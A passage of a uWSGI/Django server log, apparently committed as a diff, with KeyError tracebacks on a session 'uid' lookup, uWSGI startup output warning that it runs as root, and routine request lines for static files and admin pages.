"/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 18395|app: 0|req: 23/27] 223.104.39.100 () {38 vars in 935 bytes} [Fri Jan 8 13:38:25 2021] GET / => generated 57925 bytes in 25 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0) +[pid: 18395|app: 0|req: 24/28] 117.100.100.38 () {42 vars in 1423 bytes} [Fri Jan 8 13:38:47 2021] GET /single/4/ => generated 8198 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18395|app: -1|req: -1/29] 117.100.100.38 () {40 vars in 1368 bytes} [Fri Jan 8 13:38:48 2021] GET /static/img/t_photo/4_2.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 18395|app: 0|req: 25/30] 117.100.100.38 () {38 vars in 1324 bytes} [Fri Jan 8 13:39:05 2021] GET / => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 18395|app: 0|req: 26/31] 61.151.178.236 () {32 vars in 540 bytes} [Fri Jan 8 13:39:17 2021] GET / => generated 57184 bytes in 33 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 18395|app: 0|req: 27/32] 61.129.6.174 () {32 vars in 538 bytes} [Fri Jan 8 13:39:20 2021] GET / => generated 57182 bytes in 28 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 18395|app: 0|req: 28/33] 117.100.100.38 () {36 vars in 626 bytes} [Fri Jan 8 13:39:20 2021] GET / => generated 57452 bytes in 24 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1) +Not Found: /favicon.ico +[pid: 18395|app: 0|req: 29/34] 117.100.100.38 () {36 vars in 595 bytes} [Fri Jan 8 13:39:22 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Fri Jan 8 13:39:51 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!! +Fri Jan 8 13:39:51 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!! +*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:39:52 2021] *** +compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04 +os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 +nodename: VM-0-13-centos +machine: x86_64 +clock source: unix +pcre jit disabled +detected number of CPU cores: 1 +current working directory: / +detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /www/wwwroot/master +your processes number limit is 7269 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +!!! no /etc/mime.types file found !!! +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on 0.0.0.0:8080 fd 4 +uwsgi socket 0 bound to TCP address 127.0.0.1:40520 (port auto-assigned) fd 3 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)] +Python main interpreter initialized at 0x246c9c0 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +python threads support enabled +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 166752 bytes (162 KB) for 2 cores +*** Operational MODE: threaded *** +ModuleNotFoundError: No module named 'master' +unable to load app 0 (mountpoint='') (callable not found or import error) +WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x246c9c0 pid: 18964 (default app) +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 18964) +spawned uWSGI worker 1 (pid: 18965, cores: 2) +spawned uWSGI http 1 (pid: 18966) +[pid: 18965|app: 0|req: 1/1] 117.100.100.38 () {36 vars in 626 bytes} [Fri Jan 8 13:40:03 2021] GET / => generated 6416 bytes in 44 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/2] 117.100.100.38 () {38 vars in 714 bytes} [Fri Jan 8 13:40:03 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/3] 117.100.100.38 () {38 vars in 697 bytes} [Fri Jan 8 13:40:03 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/4] 117.100.100.38 () {38 vars in 722 bytes} [Fri Jan 8 13:40:03 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/5] 117.100.100.38 () {38 vars in 718 bytes} [Fri Jan 8 13:40:04 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/6] 117.100.100.38 () {38 vars in 736 bytes} [Fri Jan 8 13:40:04 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/7] 117.100.100.38 () {38 vars in 716 bytes} [Fri Jan 8 13:40:04 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/8] 117.100.100.38 () {38 vars in 695 bytes} [Fri Jan 8 13:40:04 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/9] 117.100.100.38 () {38 vars in 713 bytes} [Fri Jan 8 13:40:04 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/10] 117.100.100.38 () {38 vars in 711 bytes} [Fri Jan 8 13:40:04 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/11] 117.100.100.38 () {38 vars in 703 bytes} [Fri Jan 8 13:40:05 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/12] 117.100.100.38 () {38 vars in 716 bytes} [Fri Jan 8 13:40:24 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +Not Found: /static/img/apple-touch-icon-114x114.png +[pid: 18965|app: 0|req: 2/13] 117.100.100.38 () {38 vars in 740 bytes} [Fri Jan 8 13:40:24 2021] GET /static/img/apple-touch-icon-114x114.png => generated 3481 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/14] 117.100.100.38 () {38 vars in 706 bytes} [Fri Jan 8 13:40:24 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/15] 117.100.100.38 () {38 vars in 738 bytes} [Fri Jan 8 13:40:24 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 3/16] 117.100.100.38 () {40 vars in 773 bytes} [Fri Jan 8 13:40:33 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 4/17] 117.100.100.38 () {40 vars in 775 bytes} [Fri Jan 8 13:40:33 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 5/18] 117.100.100.38 () {48 vars in 926 bytes} [Fri Jan 8 13:40:46 2021] POST /my-admin/ => generated 27 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 6/19] 117.100.100.38 () {40 vars in 830 bytes} [Fri Jan 8 13:40:46 2021] GET /admin-home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 7/20] 117.100.100.38 () {40 vars in 832 bytes} [Fri Jan 8 13:40:46 2021] GET /admin-home/ => generated 12638 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/21] 117.100.100.38 () {38 vars in 827 bytes} [Fri Jan 8 13:40:47 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/22] 117.100.100.38 () {38 vars in 761 bytes} [Fri Jan 8 13:40:47 2021] GET /static/css/style.css => generated 118751 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/23] 117.100.100.38 () {38 vars in 773 bytes} [Fri Jan 8 13:40:47 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/24] 117.100.100.38 () {38 vars in 790 bytes} [Fri Jan 8 13:40:47 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/25] 117.100.100.38 () {38 vars in 802 bytes} [Fri Jan 8 13:40:47 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/26] 117.100.100.38 () {38 vars in 808 bytes} [Fri Jan 8 13:40:47 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/27] 117.100.100.38 () {38 vars in 766 bytes} [Fri Jan 8 13:40:47 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/28] 117.100.100.38 () {38 vars in 742 bytes} [Fri Jan 8 13:40:49 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/29] 117.100.100.38 () {38 vars in 754 bytes} [Fri Jan 8 13:40:49 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/30] 117.100.100.38 () {38 vars in 830 bytes} [Fri Jan 8 13:40:49 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/31] 117.100.100.38 () {38 vars in 752 bytes} [Fri Jan 8 13:40:49 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/32] 117.100.100.38 () {38 vars in 826 bytes} [Fri Jan 8 13:40:49 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 8/33] 117.100.100.38 () {38 vars in 840 bytes} [Fri Jan 8 13:40:49 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 9/34] 117.100.100.38 () {38 vars in 852 bytes} [Fri Jan 8 13:40:49 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 10/35] 117.100.100.38 () {38 vars in 844 bytes} [Fri Jan 8 13:40:49 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 11/36] 117.100.100.38 () {38 vars in 808 bytes} [Fri Jan 8 13:40:49 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 12/37] 117.100.100.38 () {38 vars in 828 bytes} [Fri Jan 8 13:40:50 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 13/38] 117.100.100.38 () {38 vars in 828 bytes} [Fri Jan 8 13:40:50 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 14/39] 117.100.100.38 () {38 vars in 884 bytes} [Fri Jan 8 13:40:50 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 15/40] 117.100.100.38 () {38 vars in 776 bytes} [Fri Jan 8 13:40:50 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 16/41] 117.100.100.38 () {38 vars in 774 bytes} [Fri Jan 8 13:40:50 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 17/42] 117.100.100.38 () {40 vars in 836 bytes} [Fri Jan 8 13:40:56 2021] GET /announcement => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 18/43] 117.100.100.38 () {40 vars in 838 bytes} [Fri Jan 8 13:40:56 2021] GET /announcement/ => generated 7409 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/44] 117.100.100.38 () {38 vars in 768 bytes} [Fri Jan 8 13:40:56 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 19/45] 117.100.100.38 () {38 vars in 840 bytes} [Fri Jan 8 13:40:56 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 20/46] 117.100.100.38 () {38 vars in 852 bytes} [Fri Jan 8 13:40:56 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 21/47] 117.100.100.38 () {38 vars in 844 bytes} [Fri Jan 8 13:40:56 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 22/48] 117.100.100.38 () {38 vars in 808 bytes} [Fri Jan 8 13:40:56 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 23/49] 117.100.100.38 () {38 vars in 828 bytes} [Fri Jan 8 13:40:56 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 24/50] 117.100.100.38 () {38 vars in 828 bytes} [Fri Jan 8 13:40:56 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 25/51] 117.100.100.38 () {38 vars in 884 bytes} [Fri Jan 8 13:40:56 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 26/52] 117.100.100.38 () {38 vars in 776 bytes} [Fri Jan 8 13:40:56 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 27/53] 117.100.100.38 () {38 vars in 774 bytes} [Fri Jan 8 13:40:56 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 28/54] 117.100.100.38 () {40 vars in 836 bytes} [Fri Jan 8 13:40:58 2021] GET /kind-manage => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 29/55] 117.100.100.38 () {40 vars in 838 bytes} [Fri Jan 8 13:40:58 2021] GET /kind-manage/ => generated 10151 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 30/56] 117.100.100.38 () {38 vars in 840 bytes} [Fri Jan 8 13:40:58 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 31/57] 117.100.100.38 () {38 vars in 852 bytes} [Fri Jan 8 13:40:59 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 32/58] 117.100.100.38 () {38 vars in 844 bytes} [Fri Jan 8 13:40:59 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 33/59] 117.100.100.38 () {38 vars in 808 bytes} [Fri Jan 8 13:40:59 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 34/60] 117.100.100.38 () {38 vars in 828 bytes} [Fri Jan 8 13:40:59 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 35/61] 117.100.100.38 () {38 vars in 828 bytes} [Fri Jan 8 13:40:59 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 36/62] 117.100.100.38 () {38 vars in 884 bytes} [Fri Jan 8 13:40:59 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 37/63] 117.100.100.38 () {38 vars in 776 bytes} [Fri Jan 8 13:40:59 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 38/64] 117.100.100.38 () {38 vars in 774 bytes} [Fri Jan 8 13:40:59 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 39/65] 117.100.100.38 () {38 vars in 840 bytes} [Fri Jan 8 13:41:05 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 40/66] 117.100.100.38 () {38 vars in 852 bytes} [Fri Jan 8 13:41:05 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 41/67] 117.100.100.38 () {38 vars in 844 bytes} [Fri Jan 8 13:41:05 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 42/68] 117.100.100.38 () {38 vars in 828 bytes} [Fri Jan 8 13:41:05 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 43/69] 117.100.100.38 () {38 vars in 808 bytes} [Fri Jan 8 13:41:05 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 44/70] 117.100.100.38 () {38 vars in 828 bytes} [Fri Jan 8 13:41:05 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 45/71] 117.100.100.38 () {38 vars in 882 bytes} [Fri Jan 8 13:41:05 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 46/72] 117.100.100.38 () {38 vars in 774 bytes} [Fri Jan 8 13:41:05 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 47/73] 117.100.100.38 () {38 vars in 772 bytes} [Fri Jan 8 13:41:05 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 48/74] 117.100.100.38 () {38 vars in 757 bytes} [Fri Jan 8 13:41:08 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/img/apple-touch-icon-114x114.png +[pid: 18965|app: 0|req: 49/75] 117.100.100.38 () {38 vars in 783 bytes} [Fri Jan 8 13:41:09 2021] GET /static/img/apple-touch-icon-114x114.png => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Fri Jan 8 13:41:09 2021 - uwsgi_response_sendfile_do(): Broken pipe [core/writer.c line 655] during GET /static/img/favicon.ico (117.100.100.38) +[pid: 18965|app: -1|req: -1/76] 117.100.100.38 () {38 vars in 749 bytes} [Fri Jan 8 13:41:09 2021] GET /static/img/favicon.ico => generated 0 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 50/77] 117.100.100.38 () {48 vars in 942 bytes} [Fri Jan 8 13:41:20 2021] POST / => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 51/78] 117.100.100.38 () {40 vars in 808 bytes} [Fri Jan 8 13:41:20 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 52/79] 117.100.100.38 () {40 vars in 810 bytes} [Fri Jan 8 13:41:21 2021] GET /home/ => generated 8157 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 53/80] 117.100.100.38 () {42 vars in 841 bytes} [Fri Jan 8 13:41:24 2021] GET /home/ => generated 8157 bytes in 7 msecs (HTTP/1.1 200) 6 